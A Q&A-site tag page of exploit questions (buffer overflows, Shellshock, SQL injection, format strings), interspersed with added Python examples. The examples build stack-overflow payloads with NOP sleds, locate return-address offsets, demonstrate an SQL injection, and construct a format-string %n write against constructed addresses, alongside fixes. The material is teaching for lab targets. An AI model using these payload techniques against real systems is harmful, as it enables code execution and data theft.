Questions tagged [exploit]

An exploit is a piece of software, a chunk of data, or sequence of commands that takes advantage of a bug, glitch, or vulnerability in order to cause unintended or unanticipated behavior to occur. This frequently includes such things as gaining control of a computer system, allowing privilege escalation, or a denial of service attack.

790 questions
3
votes
2 answers

How are client-side security vulnerabilities generally discovered?

I mean in operating systems or their applications. The only way I can think of is to examine binaries for the use of dangerous functions like strcpy(), and then try to exploit those. Though with compiler improvements like Visual Studio's /GS switch…
Jehjoa
  • 551
  • 8
  • 23
3
votes
1 answer

Write buffer overflow exploit -- how to figure out the address of the shellcode?

When writing a buffer overflow exploit, I understand that I'll need to input an array of length (address_of_return_address - address_of_buffer). And the array needs to be filled with the address of the shellcode. So that when my input array overflows,…
ccczhang
  • 67
  • 1
  • 2
  • 8
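The layout the question describes, as an added worked example (not part of the original question or its answers): filler up to the saved return address, the return address repeated a few times, a NOP sled, and the shellcode. The offset (76), the sled address (0xbffff5c0) and the int3 stub standing in for shellcode are constructed assumptions; in practice the offset comes from a measured crash and the address from a debugger, and the `bad_chars` check is the caveat most first attempts miss: a strcpy()-driven overflow stops at the first NUL byte, so an address containing 0x00 cannot be written in full.

```python
import struct

# Constructed values for illustration only. In a real exploit the offset
# comes from a measured crash and the address from the debugger.
OFFSET_TO_RET = 76            # bytes from start of buffer to the saved return address
SLED_ADDR = 0xbffff5c0        # hypothetical address that lands inside the NOP sled
STUB_SHELLCODE = b"\xcc" * 8  # int3 traps: prove control of EIP before real shellcode goes in


def pack_addr(addr, word_size=4):
    """Little-endian address bytes, as they must appear in the input."""
    return struct.pack("<I" if word_size == 4 else "<Q", addr)


def build_payload(offset_to_ret, ret_addr, shellcode, sled_len=64, ret_repeat=4, word_size=4):
    """[filler][ret_addr * ret_repeat][NOP sled][shellcode]

    The filler saturates the buffer up to the saved return address; repeating
    the address tolerates an offset that is off by a word or two; the NOP sled
    means ret_addr only has to land somewhere in a range of 0x90 bytes rather
    than exactly on the shellcode's first byte.
    """
    return (b"A" * offset_to_ret
            + pack_addr(ret_addr, word_size) * ret_repeat
            + b"\x90" * sled_len
            + shellcode)


def saved_return_value(payload, offset_to_ret, word_size=4):
    """The value the saved return address holds after the overflow."""
    chunk = payload[offset_to_ret:offset_to_ret + word_size]
    return struct.unpack("<I" if word_size == 4 else "<Q", chunk)[0]


def bad_chars(payload, forbidden=b"\x00"):
    """Offsets of bytes the copy primitive will stop at or mangle. A strcpy()
    overflow ends at the first NUL, so an address containing 0x00 can never be
    written in full; other sinks add their own bad bytes (newline for gets(),
    whitespace for scanf("%s"))."""
    return [i for i, b in enumerate(payload) if b in forbidden]


def sled_range(buffer_addr, offset_to_ret, ret_repeat=4, sled_len=64, word_size=4):
    """Once the buffer's own address is known, any address in this inclusive
    range is a valid ret_addr: it lands in the sled and slides into the shellcode."""
    first = buffer_addr + offset_to_ret + ret_repeat * word_size
    return first, first + sled_len - 1


if __name__ == "__main__":
    p = build_payload(OFFSET_TO_RET, SLED_ADDR, STUB_SHELLCODE)
    print(len(p), hex(saved_return_value(p, OFFSET_TO_RET)), bad_chars(p))
```

The array is not "filled with the address of the shellcode" from end to end: only the words that land on the saved return address matter, and the sled is what makes an approximate address good enough.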
3
votes
1 answer

How to detect/prevent third party code dialling home?

Context: Third-party code is common to any open-source CMS, e.g. WordPress plugins and themes. I've recently encountered articles online regarding plugins/themes sending information to authors. My concern: I cannot tell WHEN a plugin/theme is sending…
Clarus Dignus
  • 3,847
  • 3
  • 31
  • 57
3
votes
0 answers

What is a specific example of how the Shellshock Bash bug could be exploited?

I read some articles (article1, article2, article3) about the Shellshock Bash bug (CVE-2014-6271 reported Sep 24, 2014) and have a general idea of what the vulnerability is and how it could be exploited. To better understand the implications of the…
Rob Bednark
  • 25,981
  • 23
  • 80
  • 125
3
votes
1 answer

Buffer overflow - Program terminated with signal SIGSEGV

I'm learning buffer overflow exploiting. I wrote a vulnerable program like this: #include <stdio.h> #include <string.h> main(int argc, char *argv[]) { char buffer[80]; strcpy(buffer, argv[1]); return 1; } Very simple program. The idea…
Peter
  • 141
  • 1
  • 1
  • 5
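A SIGSEGV with a register full of 0x41414141 shows the overflow reached the saved return address but not where in the input it sits; the usual next step is to send a cyclic pattern and map the faulting value back to an offset. Added example (not from the question or its answers) implementing that Metasploit-style pattern_create / pattern_offset logic in plain Python; the crash value 0x41336141 used in the usage call is constructed to show the lookup. For the `char buffer[80]` program above, the measured offset is what to trust rather than 80 + 4, because the compiler's stack alignment and padding decide the real distance.

```python
import string
import struct

MAX_UNIQUE = 26 * 26 * 10 * 3   # 20280 bytes before any 4-byte window could repeat


def pattern_create(length):
    """Cyclic pattern Aa0Aa1...: every 4-byte window (at any alignment) is
    unique within the first 20280 bytes, so one crash value maps to one offset."""
    if length > MAX_UNIQUE:
        raise ValueError("pattern would repeat beyond %d bytes" % MAX_UNIQUE)
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(crash_value, length=MAX_UNIQUE, word_size=4):
    """Given the register value gdb shows at the SIGSEGV (EIP on x86), return
    how many input bytes precede the saved return address, or -1 if the
    value did not come from the pattern (e.g. 0x41414141 from an all-'A' run)."""
    fmt = "<I" if word_size == 4 else "<Q"
    needle = struct.pack(fmt, crash_value)
    return pattern_create(length).find(needle)


def minimum_overwrite_length(offset, word_size=4):
    """Shortest input that fully overwrites the saved return address."""
    return offset + word_size


if __name__ == "__main__":
    # Constructed crash value: gdb reported EIP = 0x41336141 after sending the pattern.
    off = pattern_offset(0x41336141)
    print("offset:", off, "input needed:", minimum_overwrite_length(off))
```

Send `pattern_create(200)` as argv[1], read the faulting EIP from gdb, and `pattern_offset` gives the byte count to put before the address you want executed.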
3
votes
2 answers

Where does the "payload" in "payload.encoded" come from in a Metasploit exploit?

I am analyzing a Metasploit exploit here and I am trying to figure out where the payload in payload.encoded comes from on line 358. I am a newbie to exploit development, but basic programming rules say that payload should be initialized before…
TheRookierLearner
  • 3,643
  • 8
  • 35
  • 53
3
votes
3 answers

PHP magic_quotes_gpc vulnerability

I've been assigned to one of my company's legacy webapps, and after a day or two of poking around the source, I've found an SQL injection vector similar to the following: mysql_query("SELECT * FROM foo WHERE bar='" . $_GET['baz'] . "'"); I've tried…
James K.
  • 31
  • 1
  • 2
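An added example (not from the question or its answers) that reproduces the vector above against an in-memory SQLite table standing in for the MySQL one, shows the parameterized form that closes it, and includes a small triage scanner of the kind used when "poking around the source" of a legacy app: any mysql_query() call whose line also touches request data is listed for review. The table, its rows, the injected value and the PHP snippet are all constructed. magic_quotes_gpc only rewrote request data (backslash-escaping quotes) before the script saw it; it did not change what the query does, which is why the fix is to stop concatenating user input into SQL at all.

```python
import sqlite3

SUPERGLOBALS = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE")

# Constructed PHP excerpt, in the shape of the legacy code the question describes.
PHP_SAMPLE = r'''<?php
$r = mysql_query("SELECT * FROM foo WHERE bar='" . $_GET['baz'] . "'");
$q = mysql_query("SELECT * FROM foo WHERE id=" . intval($_GET['id']));
$s = mysql_query("SELECT 1");
'''

INJECTION = "x' OR '1'='1"   # constructed attacker value for ?baz=


def make_db():
    """In-memory stand-in for the MySQL table (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE foo (id INTEGER, bar TEXT)")
    conn.executemany("INSERT INTO foo VALUES (?, ?)",
                     [(1, "alpha"), (2, "beta"), (3, "gamma")])
    return conn


def vulnerable_lookup(conn, baz):
    """Mirrors: mysql_query("SELECT * FROM foo WHERE bar='" . $_GET['baz'] . "'")
    The value is pasted into the SQL text, so a quote in it rewrites the query."""
    sql = "SELECT * FROM foo WHERE bar='" + baz + "'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, baz):
    """Parameterized form: the value is bound as data and never parsed as SQL."""
    return conn.execute("SELECT * FROM foo WHERE bar=?", (baz,)).fetchall()


def find_tainted_queries(php_source):
    """Line numbers of mysql_query() calls that mention request data on the
    same line. Deliberately noisy: the intval() case below is flagged too,
    because the point is to enumerate candidates for manual review."""
    hits = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        if "mysql_query(" in line and any(g in line for g in SUPERGLOBALS):
            hits.append(lineno)
    return hits


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", vulnerable_lookup(db, INJECTION))
    print("safe:", safe_lookup(db, INJECTION))
    print("review lines:", find_tainted_queries(PHP_SAMPLE))
```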
3
votes
2 answers

How to find the in-memory address of a specific instruction in a DLL

How can I find the in-memory address (for exploit writing) of a specific instruction? Specifically, I'm looking for a call ebp instruction in user32.dll on Windows XP with no Service Pack whose address I can point EIP to. I have both Immunity…
Freedom_Ben
  • 11,247
  • 10
  • 69
  • 89
3
votes
3 answers

Python security: Danger of uncollected variables out of scope

I have a method in a class which decrypts a variable, and returns it. I remove the returned variable with "del" after use. What is the danger of these garbage values being accessed...and how can I best protect myself from them? Here is the…
RightmireM
  • 2,381
  • 2
  • 24
  • 42
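Added example (not from the question or its answers) showing what `del` does and does not do for a decrypted value in Python. The XOR "cipher" and the key are constructed stand-ins for the real decryption. A `str` or `bytes` result is immutable, so nothing can overwrite it and every derived value is another immutable copy; `del` only unbinds a name, and the object stays intact while any other reference exists. A `bytearray` can be zeroed in place, which is the practical mitigation, with the caveat that copies made from it (and copies the interpreter may make internally) are not covered.

```python
from contextlib import contextmanager

KEY = 0x5A   # constructed toy key; XOR stands in for the real decryption


def encrypt(plain: bytes) -> bytes:
    return bytes(b ^ KEY for b in plain)


def decrypt_to_str(ciphertext: bytes) -> str:
    """Immutable result: nothing can scrub it, and every derived value
    (a slice, .encode(), an f-string in a log line) is another immutable copy."""
    return bytes(b ^ KEY for b in ciphertext).decode()


def decrypt_to_bytearray(ciphertext: bytes) -> bytearray:
    """Mutable buffer that can be overwritten in place before release."""
    return bytearray(b ^ KEY for b in ciphertext)


def wipe(buf: bytearray) -> None:
    for i in range(len(buf)):
        buf[i] = 0


def del_does_not_destroy(ciphertext):
    """del unbinds one name; the object lives while any reference remains
    (a cache, a closure, exception args, a debugger) and is never scrubbed."""
    plain = decrypt_to_str(ciphertext)
    held = [plain]          # some other holder of the same object
    del plain               # only the local name goes away
    return held[0]


def wipe_but_copy_survives(ciphertext):
    """In-place wiping clears the buffer itself, not copies taken from it."""
    buf = decrypt_to_bytearray(ciphertext)
    copy = bytes(buf)       # e.g. handed to a library that insists on bytes
    wipe(buf)
    return bytes(buf), copy


@contextmanager
def secret(ciphertext):
    """Decrypt into a bytearray and wipe it on exit, including on exceptions."""
    buf = decrypt_to_bytearray(ciphertext)
    try:
        yield buf
    finally:
        wipe(buf)


def use_secret(ciphertext):
    """Length seen inside the block, and what an escaped reference sees after it."""
    with secret(ciphertext) as buf:
        seen = len(buf)
        escaped = buf       # same object, so it is zeroed too
    return seen, bytes(escaped)


if __name__ == "__main__":
    ct = encrypt(b"hunter2")
    print(del_does_not_destroy(ct), wipe_but_copy_survives(ct), use_secret(ct))
```

Keep the plaintext in one `bytearray`, hand out that object rather than conversions of it, and wipe it in a `finally`; `del` on its own buys nothing against anything that can read process memory.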
3
votes
2 answers

Rails app exploited, how to find which exploit?

I've received a mail from somebody who pretends to have hacked my server, giving a few details about the server, and asking me to pay if I don't want the data to be posted online. All the apps on the server are Rails apps, and some of them were not up…
Seb K
  • 31
  • 1
3
votes
1 answer

Buffer overflow on remote server

I'm a computer security student and I'm doing a project about remote buffer overflows. I developed a vulnerable server in C, with an unsafe use of the strncpy function which actually copies 1024 bytes into a 512-byte buffer, and an exploit to test the…
manco
  • 31
  • 1
  • 2
3
votes
1 answer

In Linux, does the location of an executable affect how the setuid bit is interpreted?

In a Linux system, do the permissions of the directory in which a setuid program resides affect how the kernel launches the process? The reason I ask is that when I compiled an identical setuid program in two different directories, it only…
Mr. Shickadance
  • 5,283
  • 9
  • 45
  • 61
3
votes
1 answer

Format string attack in printf

#include <stdio.h> int main() { char s[200]; int a=123; int *b=&a; scanf("%50s",s); printf(s); if (a==31337) func(); } The aim is to execute a format string attack - to execute func() by inputting a string. I tried to…
Jaroszewski Piotr
  • 353
  • 1
  • 3
  • 11
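Added example (not from the question or its answers) for the two halves of this problem: first a parser of printf's conversion grammar that shows which directives an attacker-controlled format string performs and whether it contains the `%n` write; second the standard `<addr>%<pad>d%<k>$n` construction that makes printf's output counter equal 31337 and store it through a pointer it finds on its own stack, checked against the constraints the program imposes (`scanf("%50s")` reads at most 50 bytes and stops at whitespace). The address of `a` (0xbffff4ac) and the argument index 6 are constructed assumptions; in practice the index is found by counting `%x` pops until the leading address bytes come back.

```python
import re
import struct

# printf conversion grammar: %[pos$][flags][width][.prec][length]conv
DIRECTIVE = re.compile(
    r"%(?:(?P<pos>\d+)\$)?[-+ #0]*(?P<width>\d+|\*)?(?:\.(?:\d+|\*))?"
    r"(?:hh|h|ll|l|q|j|z|t|L)?(?P<conv>[diouxXeEfFgGaAcspn%])"
)


def audit_format(fmt):
    """Conversions printf(fmt) would perform, as (offset, conversion, positional
    argument or None). %% is skipped: a literal percent that consumes no argument."""
    return [(m.start(), m.group("conv"), m.group("pos"))
            for m in DIRECTIVE.finditer(fmt) if m.group("conv") != "%"]


def has_write_directive(fmt):
    """%n turns the format string from an information leak into a memory write."""
    return any(conv == "n" for _, conv, _ in audit_format(fmt))


def n_write_payload(target_addr, value, arg_index):
    """<addr>%<pad>d%<k>$n : when printf reaches %n it has emitted len(addr)+pad
    bytes and stores that count through the pointer it finds as argument k,
    which is where the leading address bytes sit on the stack (k is assumed here)."""
    addr = struct.pack("<I", target_addr)
    pad = value - len(addr)
    if pad < 1:
        raise ValueError("value too small to reach with a single %n")
    return addr + ("%%%dd%%%d$n" % (pad, arg_index)).encode()


def bytes_written_before_n(payload):
    """Simulate printf's output counter up to the first %n. Assumes each printed
    value fits inside its field width (true for %31333d and any 32-bit int);
    directives without a width are counted as one byte."""
    text = payload.decode("latin-1")
    count, last = 0, 0
    for m in DIRECTIVE.finditer(text):
        count += m.start() - last
        last = m.end()
        conv, width = m.group("conv"), m.group("width")
        if conv == "%":
            count += 1
        elif conv == "n":
            return count
        elif width == "*":
            raise ValueError("width taken from the stack: cannot count statically")
        else:
            count += int(width) if width else 1
    return None


def scanf_accepts(payload, max_width=50):
    """The target reads with scanf("%50s"): at most 50 bytes, and the read stops
    at whitespace, so address bytes that are whitespace or NUL break the payload."""
    return (len(payload) <= max_width
            and not any(b in b"\x00\t\n\v\f\r " for b in payload))


if __name__ == "__main__":
    p = n_write_payload(0xbffff4ac, 31337, 6)
    print(p, bytes_written_before_n(p), scanf_accepts(p))
```

The fix for the program is `printf("%s", s)`: the user's bytes become an argument instead of the format, and `audit_format` of the real format string then reports a single `%s`.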
3
votes
1 answer

Disable backtrace

I'm training on heap overflow exploits on my BackTrack 5 laptop. However, BackTrack seems to have a protection against these attacks. Here is what I get when I try to corrupt the metadata of malloc's allocated chunks. Starting program:…
joub
  • 117
  • 10
3
votes
2 answers

How to guard against Resource exhaustion and other vulnerabilities?

We happened to use IBM AppScan http://www-01.ibm.com/software/awdtools/appscan/ against our Java codebase, and it returned around 3000 high severity vulnerabilities. Most of them happen to be System Information Leak, which it thinks is happening…
roymustang86
  • 8,054
  • 22
  • 70
  • 101